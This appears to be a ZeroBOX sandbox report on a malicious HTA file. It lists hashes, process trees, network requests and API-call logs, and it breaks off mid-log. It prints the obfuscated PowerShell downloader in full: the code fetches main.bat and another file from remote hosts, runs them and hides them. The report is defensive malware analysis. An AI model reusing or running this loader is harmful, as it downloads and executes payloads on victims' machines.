popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

artwork.hta

Generic Malware Antivirus PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 17, 2023, 9:41 a.m. Oct. 17, 2023, 9:43 a.m.
Size 16.8KB
Type HTML document, ASCII text, with very long lines, with CRLF line terminators
MD5 b3a69d39ea2f074e520077721b475d51
SHA256 8e28ddc558064889072da509008e162887252a6237d305b528620508b450f725
CRC32 EA325F01
ssdeep 192:WqgAUxKcGb+e64JVHzWPUgPYL1eKfTQhDcqsOHQXhSnP:dgA/RFOf
Yara None matched

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\artwork.hta

    2556

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $GByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){powershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySpBOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeoGSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHXI.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXgEUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjnKZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,53471,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXbHysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$JnufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppData + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQygQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53476,53419,53408,53408,53480,53480,53480,53411,53407,53469,53478,53471,53458,53473,53466,53460,53407,53460,53472,53470,53408,53461,53472,53406,53471,53472,53477,53406,53469,53466,53471,53468,53406,53465,53462,53475,53462,53406,53478,53476,53462,53406,53465,53472,53476,53477,53466,53471,53464,53406,53466,53471,53476,53477,53462,53458,53461,53408,53410,53415,53418,53416,53410,53411,53418,53418,53418,53415,53414,53416,53416,53410,53410,53413,53410,53417,53424,53418,53414,53416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAXg + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53419,53408,53408,53418,53410,53407,53411,53409,53416,53407,53410,53417,53412,53407,53418,53419,53417,53409,53409,53409,53408,53470,53458,53466,53471,53407,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDnoaE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;

      2652

Name Response Post-Analysis Lookup
www2.lunapic.com
A 72.9.146.243
72.9.146.243
IP Address Status Action
164.124.101.2 Active Moloch
72.9.146.243 Active Moloch
91.207.183.9 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception setting "SecurityProtocol": "Cannot convert null to type "System.Net.
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: SecurityProtocolType" due to invalid enumeration values. Specify one of the fol
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: lowing enumeration values and try again. The possible enumeration values are "S
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: sl3, Tls"."
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: At line:1 char:984
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: + function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $G
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: ByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjn
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: KZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($B
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: hpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){pow
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWi
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: th((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySp
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: BOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeo
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: GSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHX
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: I.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXg
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: EUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjn
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: KZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,5347
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: 1,53477));[Net.ServicePointManager]:: <<<< SecurityProtocol = [Net.SecurityProt
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: ocolType]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData($gZGtloGwxbqkVPKJdOb);
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: return $GByFakU};function DRtLNlwgqwjnKZDxdA($PQDugbiZIXH){$JnufV=53361;$iYPaXb
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: Hysg=$Null;foreach($ECwsQTiF in $PQDugbiZIXH){$iYPaXbHysg+=[char]($ECwsQTiF-$Jn
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: ufV)};return $iYPaXbHysg};function GzHPwnswDBT(){$EZmGpVItgHnJFBAXg = $env:AppD
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: ata + '\';$txOYkVqMEfMVH = $EZmGpVItgHnJFBAXg + '169712999657711418?95755383518
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: ';If(Test-Path -Path $txOYkVqMEfMVH){Invoke-Item $txOYkVqMEfMVH;}Else{ $yaaCfQy
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: gQDaNtEjW = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,53473,53
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: 416,53414,53414,53412,53417,53412,53414,53410,53417));XNUFvsdxBy $txOYkVqMEfMVH
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: $yaaCfQygQDaNtEjW;Invoke-Item $txOYkVqMEfMVH;};$VdPzzDnoaE = $EZmGpVItgHnJFBAX
console_handle: 0x000001a3
1 1 0

WriteConsoleW

 buffer: g + 'main.bat'; if (Test-Path -Path $VdPzzDnoaE){fiUxsgPBJYMnKEby $VdPzzDnoaE;}
console_handle: 0x000001af
1 1 0

WriteConsoleW

 buffer: Else{ $mLRpZci = aNXgEUjAXQufsCeCuo (DRtLNlwgqwjnKZDxdA @(53465,53477,53477,534
console_handle: 0x000001bb
1 1 0

WriteConsoleW

 buffer: ,53459,53458,53477));XNUFvsdxBy $VdPzzDnoaE $mLRpZci;fiUxsgPBJYMnKEby $VdPzzDno
console_handle: 0x000001df
1 1 0

WriteConsoleW

 buffer: aE;};dQGoaingOScc $VdPzzDnoaE;;;;;}GzHPwnswDBT;
console_handle: 0x000001eb
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException
console_handle: 0x000001f7
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : PropertyAssignmentException
console_handle: 0x00000203
1 1 0

WriteConsoleW

 buffer: Exception calling "DownloadData" with "1" argument(s): "The underlying connecti
console_handle: 0x0000001b
1 1 0

WriteConsoleW

 buffer: on was closed: An unexpected error occurred on a send."
console_handle: 0x00000027
1 1 0

WriteConsoleW

 buffer: At line:1 char:1076
console_handle: 0x00000033
1 1 0

WriteConsoleW

 buffer: + function XNUFvsdxBy($BhpHTDG, $GByFakU){[IO.File]::WriteAllBytes($BhpHTDG, $G
console_handle: 0x0000003f
1 1 0

WriteConsoleW

 buffer: ByFakU)};function fiUxsgPBJYMnKEby($BhpHTDG){if($BhpHTDG.EndsWith((DRtLNlwgqwjn
console_handle: 0x0000004b
1 1 0

WriteConsoleW

 buffer: KZDxdA @(53407,53461,53469,53469))) -eq $True){rundll32.exe $BhpHTDG }elseif($B
console_handle: 0x00000057
1 1 0

WriteConsoleW

 buffer: hpHTDG.EndsWith((DRtLNlwgqwjnKZDxdA @(53407,53473,53476,53410))) -eq $True){pow
console_handle: 0x00000063
1 1 0

WriteConsoleW

 buffer: ershell.exe -ExecutionPolicy unrestricted -File $BhpHTDG}elseif($BhpHTDG.EndsWi
console_handle: 0x0000006f
1 1 0

WriteConsoleW

 buffer: th((DRtLNlwgqwjnKZDxdA @(53407,53470,53476,53466))) -eq $True){misexec /qn /i $
console_handle: 0x0000007b
1 1 0

WriteConsoleW

 buffer: BhpHTDG}else{Start-Process $BhpHTDG}};function dQGoaingOScc($XNUFvsdxBy){$ZCySp
console_handle: 0x00000087
1 1 0

WriteConsoleW

 buffer: BOwPMTnvfeq=(DRtLNlwgqwjnKZDxdA @(53433,53466,53461,53461,53462,53471));$ibXFeo
console_handle: 0x00000093
1 1 0

WriteConsoleW

 buffer: GSwHXI=(Get-ChildItem $XNUFvsdxBy -Force);$ibXFeoGSwHXI.Attributes=$ibXFeoGSwHX
console_handle: 0x0000009f
1 1 0

WriteConsoleW

 buffer: I.Attributes -bor ([IO.FileAttributes]$ZCySpBOwPMTnvfeq).value__};function aNXg
console_handle: 0x000000ab
1 1 0

WriteConsoleW

 buffer: EUjAXQufsCeCuo($gZGtloGwxbqkVPKJdOb){$WMYbNNglKDgIHe = New-Object (DRtLNlwgqwjn
console_handle: 0x000000b7
1 1 0

WriteConsoleW

 buffer: KZDxdA @(53439,53462,53477,53407,53448,53462,53459,53428,53469,53466,53462,5347
console_handle: 0x000000c3
1 1 0

WriteConsoleW

 buffer: 1,53477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolTy
console_handle: 0x000000d3
1 1 0

WriteConsoleW

 buffer: pe]::TLS12;$GByFakU = $WMYbNNglKDgIHe.DownloadData <<<< ($gZGtloGwxbqkVPKJdOb);
console_handle: 0x000000df
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067eaf8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f4f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067e938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067e938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067e938
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f1f8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f338
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f678
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0067f5b8
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002fd3c0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002fdac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002fdac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x002fdac0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://91.207.183.9:8000/main.bat
request GET http://91.207.183.9:8000/main.bat
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2556
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73bc2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 655360
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02830000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02890000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026aa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2652
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x717e2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026a2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02891000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02892000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ab000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02792000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027a5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0279c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b90000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026f6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027ac000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02793000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02794000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02795000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02796000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02797000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02798000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2652
region_size: 4096
stack_dep_bypass: 0
